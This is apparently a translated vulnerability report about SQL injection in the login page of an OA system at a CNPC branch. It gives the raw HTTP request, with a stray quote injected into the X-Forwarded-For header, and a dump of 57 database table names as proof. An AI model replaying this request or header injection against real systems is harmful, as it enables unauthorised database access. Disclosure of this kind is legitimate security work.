SQL Injection exists in the OA system of a branch of CNPC
An OA system at CNPC is vulnerable to SQL injection.
Detailed description:
POST /Login1.aspx HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/Login1.aspx
Cookie: ASP.NET_SessionId=k5buk355k0wzkwymk54owzy3
X-Forwarded-For: **.**.**.**'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 246

__VIEWSTATE=%2FwEPDwULLTE5OTkxNTMyOTVkZC%2FxeQSdZ4eJYLqEiYjhLANZe3I1&__EVENTVALIDATION=%2FwEWBQKBwrmMCgKvt6W7BALAsIjcCwKU8abfBgKM54rGBvmRUhl4M%2B1JmYWr28ehnma41gF0&Text_User=123&Text_PWD=123&txtValue=%E5%AF%86%E7%A0%81&Button1=%E7%99%BB+%E5%BD%95
Proof of vulnerability:
Database: HSBG
[57 tables]
+---------------------------------+
| dbo.ActivityArrangement         |
| dbo.ActivityRemind              |
| dbo.BASE_Application            |
| dbo.BASE_Model                  |
| dbo.BASE_OA_Inform              |
| dbo.BASE_Operation              |
| dbo.BASE_OrganiseUnit           |
| dbo.BASE_OrganiseUnit_Rule      |
| dbo.BASE_Role                   |
| dbo.BASE_Role_Model             |
| dbo.BASE_Role_New               |
| dbo.BASE_Role_Rule              |
| dbo.BASE_User                   |
| dbo.BASE_User_Class             |
| dbo.BASE_User_OrganiseUnit      |
| dbo.BASE_User_Position          |
| dbo.BASE_User_Role              |
| dbo.BASE_User_Role_New          |
| dbo.BASE_User_Rule              |
| dbo.BASE_User_Score             |
| dbo.BASE_User_Syn               |
| dbo.Comprasion                  |
| dbo.DutyAttach                  |
| dbo.HSBG_DEL                    |
| dbo.HSBG_Message                |
| dbo.HSBG_UserInfo               |
| dbo.IPFilter                    |
| dbo.MessagePool                 |
| dbo.Notice                      |
| dbo.Office_Message              |
| dbo.Office_MessageType          |
| dbo.Office_MessageType_bak      |
| dbo.Office_Message_Log          |
| dbo.Office_Message_Rank         |
| dbo.Office_Message_ReplyMessage |
| dbo.Office_Message_Send_Lync    |
| dbo.Office_Message_Status       |
| dbo.Office_Minutes_List         |
| dbo.Office_Minutes_Record       |
| dbo.Office_Minutes_Schedule     |
| dbo.Office_Schedule_Message     |
| dbo.Office_Tasks_Remind         |
| dbo.Office_UserComplain         |
| dbo.PROC_BG12_CARMANAGEMENT     |
| dbo.PersonTb_SystemUserID       |
| dbo.RemindPerson                |
| dbo.SSO_Application             |
| dbo.SSO_User_Message            |
| dbo.Sys_Suggestions             |
| dbo.V_CurrentMonth_Message      |
| dbo.V_CurrentWeek_Message       |
| dbo.V_NoReplyMessageID          |
| dbo.V_PA_CalcMonth              |
| dbo.V_PA_SHOW                   |
| dbo.V_UserOrganiseUnit          |
| dbo.Workflow_CallCar            |
| dbo.sysdiagrams                 |
+---------------------------------+
I did not go any deeper.